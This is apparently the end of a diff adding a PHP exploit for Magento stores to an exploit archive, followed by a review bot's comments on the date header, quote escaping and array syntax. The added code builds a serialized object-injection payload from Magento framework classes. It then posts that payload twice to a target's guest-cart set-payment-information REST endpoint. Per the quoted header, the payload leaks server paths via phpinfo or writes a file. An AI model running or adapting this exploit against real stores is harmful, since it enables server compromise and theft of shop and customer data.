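+$payload->paymentMethod->additional_data->additional_information = str_replace('Magento_Framework_DB_Transaction', 'Magento\\Framework\\DB\\Transaction', str_replace('Magento_Sales_Model_Order_Payment_Transaction', 'Magento\\Sales\\Model\\Order\\Payment\\Transaction', str_replace('Magento_Framework_Simplexml_Config_Cache_File', 'Magento\\Framework\\Simplexml\\Config\\Cache\\File', $serialized)));
+for($i=0; $i<2; $i++){
+$c = curl_init($argv[1].'/rest/V1/guest-carts/'.$argv[2].'/set-payment-information');
+curl_setopt($c, CURLOPT_HTTPHEADER, array('Content-Type: application/json'));
+curl_setopt($c, CURLOPT_POSTFIELDS, json_encode($payload));
+curl_exec($c);
+curl_close($c);
+}
+?>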
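Review bot: The header comment at the top of the new file carries a malformed date, `// Date: 18/05/206`; the entry's csv row and the commit are dated May 2016, so this presumably should read `// Date: 18/05/2016`, and since these header fields are what the archive indexes it is worth correcting. The same header block writes `didn\'t` inside a `//` comment, where the backslash is a literal character rather than an escape, so `// If you didn't provide whereToWrite, it will execute phpinfo to leak path.` is the intended text (the usage string further down correctly escapes the quote because it sits inside single quotes). As a point of style, the request loop at the bottom mixes long `array('Content-Type: application/json')` with the short `[]` syntax the script uses everywhere else, and the file ends with a closing `?>` that PHP-only files conventionally omit because any whitespace after it is emitted as output; `curl_setopt($c, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);` and dropping the final `?>` would make the file consistent with itself. The loop also sends the identical payload twice with no comment saying whether the repetition is required or is a retry, so a one-line why-comment above `for($i=0; $i<2; $i++){` would help the next reader.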